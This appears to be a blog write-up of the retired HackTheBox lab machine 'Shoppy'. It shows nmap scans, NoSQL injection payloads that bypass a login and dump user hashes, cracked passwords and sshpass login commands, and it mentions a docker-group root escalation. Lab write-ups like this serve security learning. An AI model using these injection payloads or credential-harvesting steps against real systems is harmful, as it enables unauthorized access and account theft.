Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
Hackthebox - Shoppy
|htbmachinesretired|

Summary

HackTheBox - Shoppy is a HackTheBox easy linux machine created by lockscan. Had a injection which lead to broken authentication. with more injection we where able to leak admin credentials using which we can access mattermost on that we get ssh credentials and get access to box checking sudo -l we see password manager can be ran as user deploy getting the password we can get deploy user shell password. As deploy user we are in docker group using which we can get root on the box.

Author:

nmap-scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Nmap 7.92 scan initiated Sun Sep 18 02:59:26 2022 as: nmap -sC -sV -oN nmap/shoppy 10.129.9.20
Nmap scan report for 10.129.9.20
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
|   256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
|_  256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
80/tcp open  http    nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
|_http-server-header: nginx/1.23.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 18 02:59:48 2022 -- 1 IP address (1 host up) scanned in 21.82 seconds

nmap all ports

1
2
3
4
5
6
7
8
9
10
# Nmap 7.92 scan initiated Sun Sep 18 03:00:07 2022 as: nmap -p- -oN nmap/shoppy-all 10.129.9.20
Nmap scan report for shoppy.htb (10.129.9.20)
Host is up (0.16s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9093/tcp open  copycat

# Nmap done at Sun Sep 18 03:14:45 2022 -- 1 IP address (1 host up) scanned in 877.86 seconds

Web

We find a admin login panel

With payload as

1
admin'||'

We gete access to admin panel

Searching for admin on the user search feature 

1
';return 'a'=='a' && ''=='
1
[{"_id":"62db0e93d6d6a999a66ee67a","username":"admin","password":"23c6877d9e2b564ef8b32c3a23de27b2"},{"_id":"62db0e93d6d6a999a66ee67b","username":"josh","password":"6ebcea65320589ca4f2f1ce039975995"}]

cracking the password we get password for josh as remembermethisway

Checking metamask with that creds we see creds for ssh

Trying ssh with

1
sshpass -p 'Sh0ppyBest@pp!' ssh jaeger@shoppy.htb

Checking sudo -l we see we can run /home/deploy/password-manager as deploy user.

We can see the master password to be Sample

With the master password we can get the password for deploy user

1
2
username: deploy
password: Deploying@pp!

We can ssh to the box with

1
sshpass -p 'Deploying@pp!' ssh deploy@shoppy.htb

Checking groups of deploy user we see it is in docker group

Using gtfobins we get the root shell in docker

https://www.hackthebox.eu/achievement/machine/77992/496

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/shoppy/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
linuxretiredeasygtfobinsdockerreverse-engineeringmattermostbroken-authentication